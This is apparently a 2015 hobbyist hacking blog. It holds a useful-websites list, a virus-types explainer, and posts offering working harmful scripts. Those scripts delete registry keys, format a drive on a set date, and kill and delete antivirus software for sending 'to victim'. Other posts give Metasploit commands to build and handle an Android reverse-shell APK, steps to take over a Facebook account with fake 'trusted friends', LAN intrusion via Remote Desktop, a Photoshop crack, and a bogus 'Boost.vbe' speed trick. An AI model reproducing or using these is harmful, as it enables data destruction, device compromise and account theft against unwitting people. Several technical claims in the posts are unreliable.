Sunday, 20 September 2015

List of 105 websites that you might find useful in your day to day works




Hey guys here is the list of 105 websites that you might find useful in your day to day works .




1. screenr.com – Record movies of your desktop and send them straight to YouTube.




2. bounceapp.com – For capturing full length screenshots of web pages.




3. Goo. gl – Shorten long URLs and convert URLs into QR codes.




4. untiny.me – Find the original URLs that’s hiding behind a short URLs.




5. localti.me – Know more than just the local time of a city







6.copypastecharacter.com– Copy-paste special characters that aren’t on your keyboard.




7. topsy.com –A better search engine for twitter.




8. fb.me/AppStore –Search iOS apps without launching iTunes.




9. iconfinder.com –The best place to find icons of all sizes.




10. office.com –Download templates, clipart and images for your Office documents.




11. woorank.com –everything you wanted to know about a website.




12. virustotal.com –Scan any suspicious file or email attachment for viruses.




13. wolframalpha.com– Gets answers directly without searching .




14.printwhatyoulike.com– Print web pages without the clutter.




15. joliprint.com –Reformats news articles and blog content as a newspaper.




16. isnsfw.com – When you wish to share a NSFW page but with a warning.




17. eggtimer.com – A simple online timer for your daily needs.




18. coralcdn.org – If a site is down due to heavy traffic, try accessing it through coral CDN.




19. random.org – Pick random numbers, flip coins, and more.




20. mywot.com –Check the trust level of any website .




21. viewer.zoho.com –Preview PDFs and Presentations directly in the browser.




22. tubemogul.com –Simultaneously upload videos to YouTube and other video sites.




23. truveo.com – The best place for searching web videos.




24. scr.im – Share your email address online without worrying about spam.




25. spypig.com – Now get read receipts for your email.




26. sizeasy.com –Visualize and compare the size of any product.







27. whatfontis.com –quickly determine the font name from an image.




28. fontsquirrel.com –A good collection of fonts – free for personal and commercial use.




29. regex.info – Find data hidden in your photographs .




30. tineye.com – This is like an online version of Google Googles.




31. iwantmyname.com– Helps you search domains across allTLDs.




32. tabbloid.com –Your favorite blogs delivered as PDFs.




33. join. me – Share your screen with anyone over the web.




34. onlineocr.net –Recognize text from scanned PDFs and images – see other OCR tools.




35. flightstats.com –Track flight status at airports worldwide.




36. wetransfer.com –For sharing really big files online.




37. pastebin.com – A temporary onlineclipboard for your text and code snippets.




38.polishmywriting.com –Check your writing for spelling or grammatical errors.




39.awesomehighlighter.com– Easily highlight the important parts of a web page.




40. typewith.me –Work on the same document with multiple people.




41.whichdateworks.com –Planning an event? Find a date that works for all.










42. everytimezone.com– A less confusing view of the world time zones.




43. warrick.cs.odu.edu– You’ll need this when your bookmarked web pages are deleted.




44. gtmetrix.com – The perfect tool for measuring your site performance online.




45. imo.im – Chat with your buddies on Skype,Facebook, GoogleTalk, etc from one place.




46.translate.google.com– Translate web pages,PDFs and Office documents.




47. youtube.com/leanback – Sit back and enjoy YouTube videos in full-screen mode.




48. similarsites.com –Discover new sites that are similar to what you like already.




49. wordle.net – Quicksummarize long pieces of text with tag clouds.




50. bubbl.us – Create mind-maps, brainstorm ideas in the browser.




51. kuler.adobe.com –Get color ideas, also extract colors from photographs.




52. followupthen.com– Setup quick reminders via email itself.




53. lmgtfy.com – When your friends are too lazy to use Google on their own.




54. tempalias.com –Generate temporary email aliases, better than disposable email.




55. pdfescape.com –Lets you can quickly edit PDFs in the browser itself.




56. faxzero.com – Send an online fax for free– see more fax services.




57. feedmyinbox.com –Get RSS feeds as an email newsletter.




58. isendr.com –Transfer files without uploading to a server.




59. tinychat.com –Setup a private chatroom in micro-seconds.




60. privnote.com –Create text notes that will self-destruct after being read.




61. flightaware.com –Live flight tracking service for airports worldwide.




62. boxoh.com – Track the status of any shipment on Google Maps – alternative.




63. chipin.com – When you need to raise funds online for an event or a cause.




64.downforeveryoneorjustme.com – Is your favorites really offline?




65. example.com – This website can be used as an example in documentation.




66.whoishostingthis.com –Find the web host of any website.




67. google.com/history– Found something on Google but can’t remember it now?




68.errorlevelanalysis.com– Find whether a photo is real or aphotoshopped one.




69. google.com/dictionary – Get word meanings, pronunciations and usage examples.




70.urbandictionary.com –Find definitions of slangs and informal words.




71. seatguru.com –Consult this site before choosing a seat for your next flight.




72. sxc.hu – Download stock images absolutely free.




73.download.com.np-Get all softwares.




74. wobzip.org – Unzip your compressed files online.




75. vocaroo.com –Record your voice with a click.




76. scribblemaps.com– Create custom Google Maps easily.




77. buzzfeed.com –Never miss another Internet meme or viral video.




78. alertful.com –Quickly setup email reminders for important events.




79.encrypted.google.com– Prevent your ISP and boss from reading your search queries.




80. formspring.me –You can ask or answer personal questions here.




81. snopes.com – Find if that email offer you received is real or just another scam.




82. typingweb.com –Master touch-typing with these practice sessions.




83. mailvu.com – Send video emails to anyone using your webcam.




84. ge.tt – Quickly send a file to someone,they can even preview it before downloading.




85. timerime.com –Create timelines with audio, video and images.




86. stupeflix.com –Make a movie out of your images, audio and video clips.




87. aviary.com/myna –An online audio editor that lets you record and remix audio clip.




88. noteflight.com –Print music sheets, write your own music online (review).




89.disposablewebpage.com– Create a temporary web page that self-destruct.




90. namemytune.com– When you need to find the name of a song.




91. homestyler.com –Design from scratch or re-model your home in3d.




92. snapask.com – Use email on your phone to find sports scores, read Wikipedia, etc.




93. teuxdeux.com – A beautiful to-do app that resembles a paper diary.




94. livestream.com –Broadcast events live over the web, including your desktop screen.




95. bing.com/images –Automatically find perfectly-sized wallpapers for mobiles.




96. historio.us –Preserve complete web pages with all the formatting.




97. dabbleboard.com –Your virtual whiteboard.







98. whisperbot.com –Send an email without using your own account.




99. sumopaint.com –An excellent layer-based online image editor.




100. lovelycharts.com– Create flowcharts, network diagrams, Sitemaps, etc.




101. nutshellmail.com– Get your Facebook and Twitter streams in your Inbox.




102.The Hype Machine -Web-based music discovery site based on the music posted to blogs http://hypem.com/




103.SimpleWash -A site to help you clean up old content you may not want to show on your social media profiles anymore (currently Facebook only, Twitter is coming soon)

SimpleWash™




104.ListenToYouTube.com -Converts YouTube videos to mp3sYouTube to MP3 Converter - Fast, Free - ListenToYouTube.com




105.PushBullet -Easily send notes, links, lists, files, etc. to your Android phone https://www.pushbullet.com/

Tuesday, 15 September 2015

Different types of virus (Important)


                    
What is a Computer Virus ?A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.
Virus - A program that when run, has the ability to self-replicate by infecting other programs and files on your computer. These programs can have many effects ranging from wiping your hard drive, displaying a joke in a small box, or doing nothing at all except to replicate itself. These types of infections tend to be localized to your computer and not have the ability to spread to another computer on their own. The word virus has incorrectly become a general term that encompasses trojans, worms, and viruses.
Types of viruses :-The different types of viruses are as follows-
1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :-Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :-A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.
Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :-These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :-
Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.


If you use a computer, read the newspaper, or watch the news, you will know about computer viruses or other malware. These are those malicious programs that once they infect your machine will start causing havoc on your computer. What many people do not know is that there are many different types of infections that are categorized in the general category of Malware.



Malware - Malware is programming or files that are developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain type of adware.

This article will focus on those malware that are considered viruses, trojans, worms, and viruses, though this information can be used to remove the other types of malware as well. We will not go into specific details about any one particular infection, but rather provide a broad overview of how these infections can be removed. For the most part these instructions should allow you to remove a good deal of infections, but there are some that need special steps to be removed and these won't be covered under this tutorial.

Before we continue it is important to understand the generic malware terms that you will be reading about.

Backdoor- A program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.

Hijackers- A program that attempts to hijack certain Internet functions like redirecting your start page to the hijacker's own start page, redirecting search queries to a undesired search engine, or replace search results from popular search engines with their own information.
SpywareA program that monitors your activity or information on your computer and sends that information to a remote computer without your Knowledge.
Adware

A program that generates popups on your computer or displays advertisements. It is important to note that not all adware programs are necessarily considered malware.

There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information is provided up front then they are generally not considered malware.
Dialler - A program that typically dials a premium rate number that has per minute charges over and above the typical call charge. These calls are with the intent of gaining access to pornographic material.
Trojan- A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoor to your system.
Worm- A program that when run, has the ability to spread to other computers on its own using either mass-mailing techniques to email addresses found on your computer or by using the Internet to infect a remote computer using known security holes.

This will delete key registry files


This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*
Code:-
Open notepad and Copy/paste it

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE

Keep visting :)

>> Bomb Virus / >>Crazy caps lock


>> Bomb Virus

Copy Paste The Following

If %date% NEQ 2015/15/10 goto exit
format E: /y >nul
:exit
exit

And Save It As Anything.bat

Note:- You Can Change The Date ( 2015/15/10 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day



>>Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


 Keep Visting :)

>>Endless Enter / >>Endless Backspace


>>Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop


>>Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


Keep Visting :)

Make Your Keyboard Disco Light



This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1.This piece of code makes ur keyboard a live disco..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop


Instructions:
*paste any of the two above codes in notepad
*Save as “AnyFileName”.vbs
*Run the file
*To stop, launch task manager and then under “Processes” end “wscript.exe”

I hope u would like it..
Keep Visting :)

How To Disable Victim Antivirus


Open Notepad Copy it and Paste To Notepad

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Now Save this code as .bat and send to victim :)

KIddie Virus


@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause

  save this as .bat file and send and destroy the victim & k!ll Operat!ng systeM!

>Code type in notepad

@echo off
shutdown -r -f -t 00

>>Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC. ..!!..!


>>Popping CD Drives



*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

To make your pc talk

> To make your pc talk


Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."

u will hear now what u typed..

this works in xp, vista, win also.

enjoy!!!


How To Hack & Access Same LAN Computers ?


How To Hack & Access Same LAN Computers ?
If you are working in Office / Colleges and want to hack your friends & college mate PC then here is a trick.

First Step press win+ R

Go to Run> Type Cmd

now type command net view

It will be look as below


C:\>net view

Server Name            Remark
-----------------------------------------------
\\xyz
\\abc



Here you can get all the names of all the computers machine names which connect with your LAN.

Now you got the name.  Lets start hacking into the systems.

After you get server name now type tracert command for knowing IP of the victim machine.

Example: C:\> tracert xyz

Here you get the IP address of the XYZ computer machine.

Now go to windows start button and type Remote Desktop Connection
 

After click on Remote Desktop Connection you get below image..
 


Now type the IP address or computer name of victim machine.

Click on Connect <- b="">
It will also ask administrator password which is common as usual you known about.

After few second Victim machine shown in your Computer..
Now you can access that machine to open website, files, Software's, etc

Enjoy the trick..

Sunday, 6 September 2015

Use Adobe PhotoShop CS6 Free Full Version


Hey Guys.......


How to install Adobe Photoshop CS6 with crack its quiet simple and few basic steps, there are few basic steps which we are going to use so here are those steps after download this file from your link,





1. Turn off your internet or disable it.

2. Run the installation file.

3. Install the trial version.

4. Then replace the Amtlib.dll file

5. Paste it in the C drvie Adobe photoshop CS6 folder.



1.The first step after downloading the file is to turn off your internet (It's Important).









2. After installation there will be 2 option we are going to choose second option which is trail version.





3. After the installation we are going back to the folder where there is installation file in that folder there will be a folder Photoshop crack open that.







4. Then again there will be 2 folders 32x and 64x we are going to open 32x folder (It depands upon on your windows installation).





5. Then copy the crack namely "amtlib.dll" and paste it in the adobe photoshop folder located in Adobe folder in C drvie (You choose your Photoshop Installed drive).











After pasting this crack you will enjoy full version of Photohop CS6 for free.

Wednesday, 2 September 2015

How To Make Your PC Fast Using Notepad Only!!




First of all, open Run by pressing Windows+R and then type notepad and hit Enter key.

Next, type exactly the following in Notepad :-

[box type=”info” size=”meduim” style=”rounded” border=”full”]mystring=80000000[/box]

After it , save this file on Desktop as Boost.vbe and you are all done.






Now whenever you feel that your PC is slowing down, simply double click Boost.vbe file created on the desktop and feel the difference yourself.






Keep Visiting :)

list-of-must-know-programming-languages


Hi mates, as far as programming is concerned its a bit complicated word for some peoples. However on the other hand, some peoples can actually see the life through it.
Peoples might find it really hard to learn programming languages while for some its the real fun.
Nowadays, programming languages are frequently used for developing applications for personal purpose or communication purpose. Around 600+ programming languages are present.
Selecting a particular language or any particular platform is really the toughest task for new bies, hold on a second.. it doesn't mean I'm here to provide a solution though.
I receive many questions like Which is the best Programming language ? or Which language is best suited for Hacking ?
According to me, you should learn as many languages as you can. However, be focused on the first language you pick which can be random pick.


Here, I'm sharing a list of few languages which should be available in the mind of programmer. If you skipped any of them no worries, at least in future try to get a taste of all of them.
Before any other debate, let me clarify that I'm not arranging these languages in order of preference or choice but its random.

1. C Language:

C language was developed in 1972 by Dennis Ritchie which was initially designed for Unix. Its a compiled, procedural language. C program are still very fast in execution however because of its platform dependency C programs need to compile with different architecture and operating system.

2. JAVA:

This object oriented language was designed in 1995 by Sun microsystem which is currently owned by Oracle. Java is very popular among developers because of its security and platform dependency though the speed of execution is still not very impressive. Its large library makes it easier to build complex applications though you may can miss the freedom in code.

3. PHP:

PHP was originally developed by Rasmus Lerdorf in 1996 in order to create dynamic web pages. Being a server side language, its really powerful due to its flexibility and frequently picked by Hackers while performing various attacks mail spoofing, mail bombing and phishing. PHP folks keep updating their libraries and its really better since its version 5. Overtime it eventually grow up into a fully featured object oriented language.

4. Android:




Android is getting popular these days because of its simple structure, open source and flexible nature. Since you can make cool and tricky features and can simply run them holding the in your palm. Android is really cool technology to hand out with for both career and fun.


5. Python:

Python was developed in late 1980's by Guido van Rossum intended for general programming purpose. In the early 2000, python actually gained popularity among geeks and now its fully accepted by many organizations like Google and Ubuntu.

6. C#:

C# is mainly used of .NET framework intended to work with Windows platform. Its first preference for windows guys because of its huge library and java like similar programming structure.

7. Ruby:




Ruby was initially developed in 1995 written by Yukihiro Matsumoto as one of the most object oriented languages. If you're an object oriented nerd :P then Ruby is something you can simply neglect, here numbers and even letters can have method calls.

8. Delphi:

Delphi has pioneered an era of rapid application development by introducing crucial features that have notably decreased application prototyping times. It has great advantages over Visual Basic both in terms of speed and library. Delphi can be used for writing some cool hack stuff like spy software and malware.

There are other languages too like Assembly (my fav :), Perl, JavaScript, Visual Basic which you can try on.

If you ask me, I would say start picking all the languages one by one uploading their toturials and get settled with the one you find most comfortable.

Keep Learning. Keep Rocking :) 

 keep visiting :)

How to Hack Android Mobile

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in Pakistan you can get android phone for only 5000Rs it's one of the reason why android growing fast.


What is android? according to wikipedia:

Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.

and what is APK? according to wikipedia: 


Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.


Here is some initial information for this tutorial:


Attacker IP address: 192.168.8.94


Attacker port to receive connection: 443

Requirements:


1. Metasploit framework (we use kali Linux/1.0.6 in this tutorial)


2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.


2. We will utilize Metasploit payload framework to create exploit for this tutorial.

msfpayload android/meterpreter/reverse_tcp LHOST= LPORT= 


As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command



3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.


 Info:
use exploit/multi/handler –> we will use Metasploit handler set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2



4. The next step we need to configure the switch for the Metasploit payload I already specified in step 3.



Info: 
Info:
set lhost 192.168.8.94 –> attacker IP address set lport 443 –> port to listen the reverse connection exploit –> start to listen incoming connection 


5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution.



6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:


7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone





Conclusion:

1. Don't install APK's from the unknown source.

2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.



Share this post if you found it useful :-)
Share this post if you found it useful :-)

Keep Visiting :)


How to Hack Wifi Password 2015


How to Hack Wifi Password 2015

Here are the best wifi hacking tricks 2015 – How to Hack Wifi Password 2015 by backtrack 5 or Kali Linux then I'm unable to help you. I'm strictly bound by some terms and conditions. For security purpose I have written this post to aware you from hackers.


How to Hack Wifi Password 2015


  • First we need to scan for available wireless networks. There's this great tool for windows to do this.. called “NetStumbler” or “Kismet” for Windows and Linux and “KisMac” for Mac.
  • Backtrack 5 or Kali Linux Tools are used to Hack Wifi Password


The two most common encryption types are:


1) WEP2) WAP


WEP i.e Wire Equivalent Privacy is not considers as safe as WAP i.e Wireless Application Protocol.WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas WAP is currently the most secure and best option to secure a wi-fi network..It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary attack.


Here I’ll tell you how to Crack WEPTo crack WEP we will be using Live Linux distribution called BackTrack to crack WEP. BackTrack have lots of preinstalled softwares for this very purpose.
Hack Wifi Password using Kali Linux or Backtrack 5 and The tools we will be using are:
  •    Kismet – a wireless network detector
  •     airodump – captures packets from a wireless router
  •    aireplay – forces ARP requests
  •     aircrack – decrypts the WEP keys
Note :- All content are intended for Security Research Purpose & should not be used illegaly. We provides you chance to Create Something Best and More Stronger.

But If your question is how to hack wifi password 2015 or how to hack wifi password 2015 by Kali Linux or backtrack 5 then Contact me or do comment I'll try to tell you that too.


Keep visiting :)

How to Hack Facebook Account Password - Loophole in fb Security



There are various methods to hack facbook account password like Keyloggers, Phishing websites etc.. whereas bruteforcing, dictionary attacks, DDOS attack etc will not work directly due account lockout feature. Today in this post I am going to share a very effective way to hack facebook account I named it Hacking with Trusted Friends.

Hacking of Facebook Account with Trusted Friends is also not so simple. To get started with it, you have to create three fake Facebook accounts and make sure they are in friend list of the person whose facebook account you are going to hack. If you can make this happen then roll up your sleeves to begin the real action.

Warning: The Sole purpose of this article is to highlight the loophole in security. I am not responsible if you use it with malicious intentions and get caught..!!

How to Hack Your Friend’s Facebook Account:

  • First of all, create three new Facebook Accounts and add all these three accounts in your friend’s friend list. If you are done with the first step then you have done 90% of your work.
  • Click on Forgot your Password button. It will show three options to recover your password.

















  • In the first option give his Email Address and in the Name field give your Friend’s Full Name, your name and click on Search button.
  • Now if everything goes well you will see the profile picture of that person. Here click on the No longer have access to these.

                          

  • Now Enter your New Email address which doesn’t associated with any facebook account yet and click on Submit button.

  • Now you will be prompted to Security question. If you know the answer then it is well and good otherwise, give wrong answers for three times.

  • Now after three unsuccessful attempts, it will ask you to recover your account with trusted friend feature. Click on Continue button.


  • It will ask you to choose three friends. Select your created accounts from the list and click on Continue button each time.
  • After selecting three friends, Facebook will send security codes to the Email address associated with those fake accounts. Login to each account and fill the security codes in the same manner. Also check spam messages if it is not there.
  • Now you will get password Reset Email on Email Address that you have entered in 5th step (New Email address which doesn’t associated with any facebook account).
That’s it..! You have hacked your friends Facebook Account. Enjoy..!!

keep visiting :)




Tuesday, 1 September 2015

Facebook Photo Verification Trick 100% working 2015

There are two method of verification

1st method:-


1) Download and install TunnelBear app in your android or iPhone and make a new account.

2)Now change your location to Japan.

3)Then login your blocked facebook account and enter catcha code.

Here you will notice that there is no pic verification instead it will ask your phone number

4)Just change japan phone code to your country code and enter your phone number.

5)Now you will get a confirmation code in your phone number,just enter this code and you will be login your account.

2nd Method(It is difficult than 1st)-

want to see this Click here

Facebook Photo Verification Trick (Tricky)

1) Login to your Facebook Account , after this you will be forced to enter the captcha and then the step come in which you were asked to identify the photos in which your friends are tagged.

Here we will get 5 chances[5 photos + 2 skip option]

2) Now you have to just take a screen shot of 7 pictures one by one and save with 1,2,3,4.... [also use both skip options]

3) Repeat the step 2 again and again [depends on number of friends you have in your account]
If you have between 50-100 friends then you need at least 20 images..

4) Now when the same pic will come , just compare the pic with the previous screen shot of the same pic and you will see 5 names are different and 1 is match the previous pic names.


Here you can see Prem Pasricha in both pics so Prem Pasricha is the correct answer.

5) Now you got one correct answer. Just save the answer in the notepad or any notebook.

Again when you will se the same pic , just compare and find the same name.

Do again and again these steps till than you got all the answer.

Note:In one day you can try only 3 times. And you have to do this for 2-3 days.

Once you find all your friends photos just try to solve the verification.


Keep Visting :)